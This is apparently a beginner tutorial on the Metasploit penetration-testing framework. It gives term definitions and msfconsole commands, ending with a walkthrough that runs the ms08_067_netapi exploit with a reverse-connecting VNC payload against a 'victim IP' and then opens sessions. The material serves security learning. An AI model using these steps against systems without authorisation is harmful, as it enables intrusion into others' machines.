Pen testing software: Metasploit
The Metasploit Framework is open source software for penetration testing. It is used for developing and executing exploit code against a remote target system.
If you are new to the penetration testing world, we certainly recommend the Metasploit Framework. Metasploit is a framework, not a specific application, which means its users can create their own exploits for testing a system's loopholes.
Metasploit versions
Metasploit has been released in several versions, both free and premium. For new learners the free version works just great.
The framework is available for both Windows and Linux, but we recommend learning it on a Linux distro or in a Linux environment. The premium version of the Metasploit Framework costs $5,000. The Pro version is aimed at the professional pen tester. The $5,000 is the price per year per user.
If you are using the Metasploit Framework you must understand these terms:
- System exploitation :- Trying to exploit a vulnerability in a system, machine or network.
- Payload :- The actual code which runs on the target system after exploitation.
- Listening :- Waiting for incoming connections.
- Vulnerability :- A loophole which is used to break or compromise a system's security.
- Exploit :- Code which allows a pen tester to take advantage of a vulnerable system.
Some Metasploit Framework commands for pen testing
To start Metasploit, type msfconsole in your terminal. A GUI (graphical user interface) mode is also available; for this, type msfgui in your terminal.
For help, type msfconsole -h (it gives a basic idea of how to use Metasploit).
For help inside msfconsole, just type help.
The connect command is Metasploit's alternative to telnet and ncat:
connect -s www.metasploit.com 443
Ping command :- ping 92.168.xxx.xxx
Show exploit command :- show exploits
Show payloads command :- show payloads
Info command :- info <exploit> or info <payload>
Use command :- use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options → To show available options
msf exploit(ms08_067_netapi) > set rhost 22.214.171.124 → To set remote IP (victim IP)
msf exploit(ms08_067_netapi) > set lhost 192.168.1.45 → To set local IP (attacker IP)
msf exploit(ms08_067_netapi) > set rport 445 → To set port number of remote host
msf exploit(ms08_067_netapi) > set lport 443 → To set port number of local host
msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp_dns → To set payload
msf exploit(ms08_067_netapi) > unset rhost → To remove rhost
msf exploit(ms08_067_netapi) > unset lhost → To remove local host
msf exploit(ms08_067_netapi) > exploit → To execute exploit
msf exploit(ms08_067_netapi) > back → To go back to the main window
msf exploit(ms08_067_netapi) > sessions -l → To check for any active sessions
msf exploit(ms08_067_netapi) > sessions -i ID → To enter an active session (ID must be a number)